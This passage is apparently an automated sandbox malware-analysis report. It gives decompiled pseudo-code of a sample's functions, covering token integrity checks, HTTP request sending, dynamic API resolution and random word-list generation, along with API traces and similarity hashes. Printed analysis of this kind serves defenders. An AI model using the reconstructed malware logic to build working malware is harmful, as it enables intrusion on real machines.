            • InternetCloseHandle.WININET(?), ref: 047E4C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C54
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
            • Instruction ID: e99ffac1e5312078c1b682185444f61799486066c413dfbbd76752e274aad0b3
            • Opcode Fuzzy Hash: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
            • Instruction Fuzzy Hash: 63113D766006586BC530AEABED84C6BB7FDEB4C2053954F18E185D3721C735F8498A60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E047E5E40(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
            				_v16 = 1;
            				_v20 = 0x2000;
            				if( *0x47ea2fc > 5) {
            					_v16 = 0;
            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
            						_v8 = 0;
            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
            						if(_v8 != 0) {
            							_t46 = E047E33DC(_v8);
            							if(_t46 != 0) {
            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
            								if(_t33 != 0) {
            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
            								}
            								E047E61DA(_t46);
            							}
            						}
            						CloseHandle(_v12);
            					}
            				}
            				 *_a4 = _v20;
            				return _v16;
            			}

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047E5E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047E5E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047E5EA2
            • CloseHandle.KERNEL32(00000000), ref: 047E5EF2
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047E5EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047E5ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047E5EDD
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
            • Instruction ID: e59fff6adece1b6cde69a14ee546e0b74cd1c31c03491ea25d405247f83c0b53
            • Opcode Fuzzy Hash: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
            • Instruction Fuzzy Hash: C221597590020DFFEB00DFA2CC84EFEBBB9EB48304F0041A5EA10AA251DB759E54DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 64%
            			E047E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				intOrPtr _v8;
            				intOrPtr _t9;
            				intOrPtr _t13;
            				char* _t19;
            				char* _t28;
            				void* _t33;
            				void* _t34;
            				char* _t36;
            				void* _t38;
            				intOrPtr* _t39;
            				char* _t40;
            				char* _t42;
            				char* _t43;
            
            				_t34 = __edx;
            				_push(__ecx);
            				_t9 =  *0x47ea348; // 0xc3d5a8
            				_t1 = _t9 + 0x47eb516; // 0x253d7325
            				_t36 = 0;
            				_t28 = E047E5815(__ecx, _t1);
            				if(_t28 != 0) {
            					_t39 = __imp__;
            					_t13 =  *_t39(_t28, _t38);
            					_v8 = _t13;
            					_t6 =  *_t39(_a4) + 1; // 0x5429601
            					_t40 = E047E33DC(_v8 + _t6);
            					if(_t40 != 0) {
            						strcpy(_t40, _t28);
            						_pop(_t33);
            						__imp__(_t40, _a4);
            						_t19 = E047E5063(_t33, _t34, _t40, _a8); // executed
            						_t36 = _t19;
            						E047E61DA(_t40);
            						_t42 = E047E4AC7(StrTrimA(_t36, "="), _t36);
            						if(_t42 != 0) {
            							E047E61DA(_t36);
            							_t36 = _t42;
            						}
            						_t43 = E047E2708(_t36, _t33);
            						if(_t43 != 0) {
            							E047E61DA(_t36);
            							_t36 = _t43;
            						}
            					}
            					E047E61DA(_t28);
            				}
            				return _t36;
            			}

            APIs
              • Part of subcall function 047E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E668E,253D7325,00000000,00000000,?,76B5C740,047E3ECE), ref: 047E587C
              • Part of subcall function 047E5815: sprintf.NTDLL ref: 047E589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
            • lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • strcpy.NTDLL ref: 047E66BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E5063: lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
              • Part of subcall function 047E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,047E66F3,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E4AD1
              • Part of subcall function 047E4AC7: _snprintf.NTDLL ref: 047E4B2F
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
            • Instruction ID: 40384eef5541a5d43349ddac50447f29ccbf796c618402297544cc557e7f7b93
            • Opcode Fuzzy Hash: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
            • Instruction Fuzzy Hash: 6411A373901129779612BBBADC88CBE37AD9E5D6683454316FA04AB302DE79FD0247A0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 353 401202-401214 call 4012e6 356 4012d5 353->356 357 40121a-40124f GetModuleHandleA GetProcAddress 353->357 358 4012dc-4012e3 356->358 359 401251-401265 GetProcAddress 357->359 360 4012cd-4012d3 call 401ba9 357->360 359->360 362 401267-40127b GetProcAddress 359->362 360->358 362->360 364 40127d-401291 GetProcAddress 362->364 364->360 365 401293-4012a7 GetProcAddress 364->365 365->360 366 4012a9-4012ba call 40110b 365->366 368 4012bf-4012c4 366->368 368->360 369 4012c6-4012cb 368->369 369->358
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);
            				if(_t56 == 0) {
            					_v8 = 8;
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
            											 *_a16 = _t56;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				void* __esi;
            				long _t10;
            				void* _t18;
            				void* _t22;
            
            				_t9 = __eax;
            				_t22 = __eax;
            				if(_a4 != 0 && E047E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
            					L9:
            					return GetLastError();
            				}
            				_t10 = E047E7B83(_t9, _t18, _t22, _a8); // executed
            				if(_t10 == 0) {
            					ResetEvent( *(_t22 + 0x1c));
            					ResetEvent( *(_t22 + 0x20));
            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
            						SetEvent( *(_t22 + 0x1c));
            						goto L7;
            					} else {
            						_t10 = GetLastError();
            						if(_t10 == 0x3e5) {
            							L7:
            							_t10 = 0;
            						}
            					}
            				}
            				if(_t10 == 0xffffffff) {
            					goto L9;
            				}
            				return _t10;
            			}


            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E5212
            • ResetEvent.KERNEL32(?), ref: 047E5217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 047E5224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?,?), ref: 047E522F
            • GetLastError.KERNEL32(?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E524A
              • Part of subcall function 047E2058: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064
              • Part of subcall function 047E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
              • Part of subcall function 047E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E523D
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
            • Instruction ID: 7468267b4ba301ac5d8ae5c36ef7c18b4ea40c07b388d46c1ec2b7c5e4d07d3e
            • Opcode Fuzzy Hash: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
            • Instruction Fuzzy Hash: 41014BB1100205BAEB306AB7ED48F6B77A9EF4C368F104B29E691952E1D721F814DA20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E047E5364(void** __esi) {
            				intOrPtr _v0;
            				intOrPtr _t4;
            				intOrPtr _t6;
            				void* _t8;
            				void* _t9;
            				intOrPtr _t10;
            				void* _t11;
            				void** _t13;
            
            				_t13 = __esi;
            				_t4 =  *0x47ea3cc; // 0x5429600
            				__imp__(_t4 + 0x40);
            				while(1) {
            					_t6 =  *0x47ea3cc; // 0x5429600
            					_t1 = _t6 + 0x58; // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t8 =  *_t13;
            				if(_t8 != 0 && _t8 != 0x47ea030) {
            					HeapFree( *0x47ea2d8, 0, _t8);
            				}
            				_t9 = E047E12C6(_v0, _t13); // executed
            				_t13[1] = _t9;
            				_t10 =  *0x47ea3cc; // 0x5429600
            				_t11 = _t10 + 0x40;
            				__imp__(_t11);
            				return _t11;
            			}


            APIs
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E536D
            • Sleep.KERNEL32(0000000A), ref: 047E5377
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E539F
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E53BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
            • Instruction ID: 4e4340bdf3c7fb7eab87340dd15e58db0dad98b1d32837e209101070bf1f1502
            • Opcode Fuzzy Hash: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
            • Instruction Fuzzy Hash: 98F0D0B1600142EBE7209FA7DD48BA67BA4DB4D348B44CB14B501DA351D674EC50DB25
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E047E2523(signed int __edx) {
            				signed int _v8;
            				long _v12;
            				CHAR* _v16;
            				long _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t21;
            				CHAR* _t22;
            				CHAR* _t25;
            				intOrPtr _t26;
            				void* _t27;
            				void* _t31;
            				intOrPtr _t32;
            				void* _t33;
            				CHAR* _t37;
            				CHAR* _t43;
            				CHAR* _t44;
            				CHAR* _t45;
            				void* _t50;
            				void* _t52;
            				signed char _t57;
            				intOrPtr _t59;
            				signed int _t60;
            				void* _t64;
            				CHAR* _t68;
            				CHAR* _t69;
            				char* _t70;
            				void* _t71;
            
            				_t62 = __edx;
            				_v20 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_t21 = E047E4520();
            				if(_t21 != 0) {
            					_t60 =  *0x47ea2fc; // 0x2000000a
            					_t56 = (_t60 & 0xf0000000) + _t21;
            					 *0x47ea2fc = (_t60 & 0xf0000000) + _t21;
            				}
            				_t22 =  *0x47ea178(0, 2); // executed
            				_v16 = _t22;
            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
            					_t25 = E047E3037( &_v8,  &_v20); // executed
            					_t55 = _t25;
            					_t26 =  *0x47ea348; // 0xc3d5a8
            					if( *0x47ea2fc > 5) {
            						_t8 = _t26 + 0x47eb51d; // 0x4d283a53
            						_t27 = _t8;
            					} else {
            						_t7 = _t26 + 0x47eb9db; // 0x44283a44
            						_t27 = _t7;
            					}
            					E047E4332(_t27, _t27);
            					_t31 = E047E415A(_t62,  &_v20,  &_v12); // executed
            					if(_t31 == 0) {
            						CloseHandle(_v20);
            					}
            					_t64 = 5;
            					if(_t55 != _t64) {
            						_t32 = E047E27A0();
            						 *0x47ea310 =  *0x47ea310 ^ 0x81bbe65d;
            						 *0x47ea36c = _t32;
            						_t33 = E047E33DC(0x60);
            						 *0x47ea3cc = _t33;
            						__eflags = _t33;
            						if(_t33 == 0) {
            							_push(8);
            							_pop(0);
            						} else {
            							memset(_t33, 0, 0x60);
            							_t50 =  *0x47ea3cc; // 0x5429600
            							_t71 = _t71 + 0xc;
            							__imp__(_t50 + 0x40);
            							_t52 =  *0x47ea3cc; // 0x5429600
            							 *_t52 = 0x47eb142;
            						}
            						_t55 = 0;
            						__eflags = 0;
            						if(0 == 0) {
            							_t37 = RtlAllocateHeap( *0x47ea2d8, 0, 0x43);
            							 *0x47ea368 = _t37;
            							__eflags = _t37;
            							if(_t37 == 0) {
            								_push(8);
            								_pop(0);
            							} else {
            								_t57 =  *0x47ea2fc; // 0x2000000a
            								_t62 = _t57 & 0x000000ff;
            								_t59 =  *0x47ea348; // 0xc3d5a8
            								_t13 = _t59 + 0x47eb74a; // 0x697a6f4d
            								_t56 = _t13;
            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x47e927b);
            							}
            							_t55 = 0;
            							__eflags = 0;
            							if(0 == 0) {
            								asm("sbb eax, eax");
            								E047E3BD3( ~_v8 &  *0x47ea310, 0x47ea00c); // executed
            								_t43 = E047E1D8A(0, _t56, _t62, _t64, 0x47ea00c); // executed
            								_t55 = _t43;
            								__eflags = _t55;
            								if(_t55 != 0) {
            									goto L30;
            								}
            								_t44 = E047E6EA3(_t62); // executed
            								__eflags = _t44;
            								if(_t44 != 0) {
            									__eflags = _v8;
            									_t68 = _v12;
            									if(_v8 != 0) {
            										L29:
            										_t45 = E047E6815(_t62, _t68, _v8); // executed
            										_t55 = _t45;
            										goto L30;
            									}
            									__eflags = _t68;
            									if(__eflags == 0) {
            										goto L30;
            									}
            									_t55 = E047E5C31(__eflags,  &(_t68[4]));
            									__eflags = _t55;
            									if(_t55 == 0) {
            										goto L30;
            									}
            									goto L29;
            								}
            								_t55 = 8;
            							}
            						}
            					} else {
            						_t69 = _v12;
            						if(_t69 == 0) {
            							L30:
            							if(_v16 == 0 || _v16 == 1) {
            								 *0x47ea17c();
            							}
            							goto L34;
            						}
            						_t70 =  &(_t69[4]);
            						do {
            						} while (E047E23C4(_t64, _t70, 0, 1) == 0x4c7);
            					}
            					goto L30;
            				} else {
            					_t55 = _t22;
            					L34:
            					return _t55;
            				}
            			}


            APIs
              • Part of subcall function 047E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,047E253B,00000001), ref: 047E452F
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047E25B8
              • Part of subcall function 047E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 047E27C4
              • Part of subcall function 047E27A0: wsprintfA.USER32 ref: 047E2828
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • memset.NTDLL ref: 047E2612
            • RtlInitializeCriticalSection.NTDLL(054295C0), ref: 047E2623
              • Part of subcall function 047E5C31: memset.NTDLL ref: 047E5C4B
              • Part of subcall function 047E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047E5C91
              • Part of subcall function 047E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 047E5C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047E264E
            • wsprintfA.USER32 ref: 047E267E
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
            • Instruction ID: 8da4638c5c6eae3ff9ef9462ad0d4796c68556b1d96742e7d15f1f484cd27c1b
            • Opcode Fuzzy Hash: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
            • Instruction Fuzzy Hash: 5A51B771A01215EBDB11DBA7DD58BBE37ACEB0C704F148B96E502EB342E679B9408B50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E047E7040(signed int __eax, signed int _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				signed int _v20;
            				intOrPtr _t81;
            				char _t83;
            				signed int _t90;
            				signed int _t97;
            				signed int _t99;
            				char _t101;
            				unsigned int _t102;
            				intOrPtr _t103;
            				char* _t107;
            				signed int _t110;
            				signed int _t113;
            				signed int _t118;
            				signed int _t122;
            				intOrPtr _t124;
            
            				_t102 = _a8;
            				_t118 = 0;
            				_v20 = __eax;
            				_t122 = (_t102 >> 2) + 1;
            				_v8 = 0;
            				_a8 = 0;
            				_t81 = E047E33DC(_t122 << 2);
            				_v16 = _t81;
            				if(_t81 == 0) {
            					_push(8);
            					_pop(0);
            					L37:
            					return 0;
            				}
            				_t107 = _a4;
            				_a4 = _t102;
            				_t113 = 0;
            				while(1) {
            					_t83 =  *_t107;
            					if(_t83 == 0) {
            						break;
            					}
            					if(_t83 == 0xd || _t83 == 0xa) {
            						if(_t118 != 0) {
            							if(_t118 > _v8) {
            								_v8 = _t118;
            							}
            							_a8 = _a8 + 1;
            							_t118 = 0;
            						}
            						 *_t107 = 0;
            						goto L16;
            					} else {
            						if(_t118 != 0) {
            							L10:
            							_t118 = _t118 + 1;
            							L16:
            							_t107 = _t107 + 1;
            							_t15 =  &_a4;
            							 *_t15 = _a4 - 1;
            							if( *_t15 != 0) {
            								continue;
            							}
            							break;
            						}
            						if(_t113 == _t122) {
            							L21:
            							if(_a8 <= 0x20) {
            								_push(0xb);
            								L34:
            								_pop(0);
            								L35:
            								E047E61DA(_v16);
            								goto L37;
            							}
            							_t24 = _v8 + 5; // 0xcdd8d2f8
            							_t103 = E047E33DC((_v8 + _t24) * _a8 + 4);
            							if(_t103 == 0) {
            								_push(8);
            								goto L34;
            							}
            							_t90 = _a8;
            							_a4 = _a4 & 0x00000000;
            							_v8 = _v8 & 0x00000000;
            							_t124 = _t103 + _t90 * 4;
            							if(_t90 <= 0) {
            								L31:
            								 *0x47ea318 = _t103;
            								goto L35;
            							}
            							do {
            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
            								_v12 = _v12 & 0x00000000;
            								if(_a4 <= 0) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t99 = _v12;
            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
            									if(_t99 == 0) {
            										break;
            									}
            									_v12 = _v12 + 1;
            									if(_v12 < _a4) {
            										continue;
            									}
            									goto L30;
            								}
            								_v8 = _v8 - 1;
            								L30:
            								_t97 = _a4;
            								_a4 = _a4 + 1;
            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
            								__imp__(_t124);
            								_v8 = _v8 + 1;
            								_t124 = _t124 + _t97 + 1;
            							} while (_v8 < _a8);
            							goto L31;
            						}
            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
            						_t101 = _t83;
            						if(_t83 - 0x61 <= 0x19) {
            							_t101 = _t101 - 0x20;
            						}
            						 *_t107 = _t101;
            						_t113 = _t113 + 1;
            						goto L10;
            					}
            				}
            				if(_t118 != 0) {
            					if(_t118 > _v8) {
            						_v8 = _t118;
            					}
            					_a8 = _a8 + 1;
            				}
            				goto L21;
            			}


            APIs
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 047E713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 047E7152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 047E7169
            • lstrlen.KERNEL32(43175AC4), ref: 047E718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
